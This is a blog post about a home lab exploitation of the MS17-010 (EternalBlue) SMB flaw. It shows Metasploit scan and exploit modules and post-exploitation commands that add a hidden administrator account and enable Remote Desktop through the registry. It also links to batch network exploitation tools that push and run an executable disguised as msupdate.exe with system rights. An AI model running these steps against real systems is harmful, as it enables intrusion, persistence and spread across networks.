banner
肥皂的小屋

肥皂的小屋

github
steam
bilibili
douban
tg_channel

EternalBlue-Exploiting the MS17-010 Vulnerability Process

Background#

Although it has been over a year since the global outbreak of WannaCry (17-05-12), it is still valuable to reproduce and discuss.

Reference articles:

Environment Setup#

  • Kali: 192.168.2.6
  • Win7_SP1: 192.168.2.7 (default Administrator account with no password)
  • WinXP_SP3: 192.168.2.4

Using Metasploit#

Searching for Modules#

Let's first see what modules are available for ms17_010 in Metasploit:

image

For scanning, use:

auxiliary/admin/smb/ms17_010_command

or use this

auxiliary/scanner/smb/smb_ms17_010

For exploitation, we will use exploit/windows/smb/ms17_010_eternalblue.

Scanning with the Auxiliary Module#

auxiliary/admin/smb/ms17_010_command

image

We can see that the scan was successful for WinXP, but not for Win7. Let's try another scanning module:

auxiliary/scanner/smb/smb_ms17_010

image

This module identifies both target machines as vulnerable.

Exploiting with the Exploit Module#

exploit/windows/smb/ms17_010_eternalblue

image

If the firewall is enabled, the attack will not work. Disable the firewall to proceed with the attack.

Controlling the Target Machine#

Here's a solution for displaying Chinese characters correctly in the shell:

Enter chcp 65001

image

Creating a User and Adding it to the Administrator Group#

net user soapffz adminpasswd /add
net localgroup administrators soapffz /add

image

Enabling Remote Desktop#

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

To disable, use the following command:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

image

Remote Desktop Connection#

image

If your computer is logged in with another account, the remote desktop window will wait for about 20 seconds. If there is no response, the administrator account will be logged out and you will gain access to the desktop:

image

Detection and Exploitation Tools for Windows#

EternalBlues Batch Detection Tool#

Download link: http://omerez.com/repository/EternalBlues.exe

This tool can detect the presence of the ms17_010 vulnerability on hosts within the local network (fast speed):

image

MS_17_010_Scanv2.1 Detection Tool#

Download link: https://www.lanzous.com/i359xch

Slower speed:

image

cping Batch Detection Tool (Updated on 19-02-23)#

Introduction and usage reference article: Internal Network - Scanning Live Hosts

k8 Enhanced Version zzz Exploitation Tool (Updated on 19-02-23)#

Internal network batch MS17-010 overflow tool, from the k8 team: https://www.cnblogs.com/k8gege/p/10391101.html

The following tutorial is from k8:

Tool: k8 Enhanced Version zzz

Compiled with: Python

Vulnerability: MS17-010

Usage:

zzz_exploit.exe 192.11.22.82
zzz_exploit.exe 192.11.22.82 with exe parameters
zzz_exploit.exe 192.11.22.82 with exe parameters and pipe name

For example, if the exe startup parameter is m.exe -Start, the command for practical use would be zzz_exploit.exe 192.11.22.82 -Start

Batch mode within the internal network

It can be combined with cping to overflow the internal network. Rename it to smbcheck, but the exe must be the version without parameters. (Other tools can also be used, just provide the IP parameter)

Because cping only passes the IP, it does not pass any other parameters. Before using, rename any exe to ma.dat

If the overflow is successful, the exe will be automatically transferred to the target machine and started with system privileges.

Let's first try the effect without executing the exe program:

image

Then, follow the tutorial and rename a classic IP radar tool to ma.dat and place it in the folder:

image

Now, let's try again:

image

We can see that our IP radar exe was uploaded to C:\WINDOWS\Temp\msupdate.exe, but since it is not a backdoor, the service failed to start:

image

This is the general usage of the tool.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.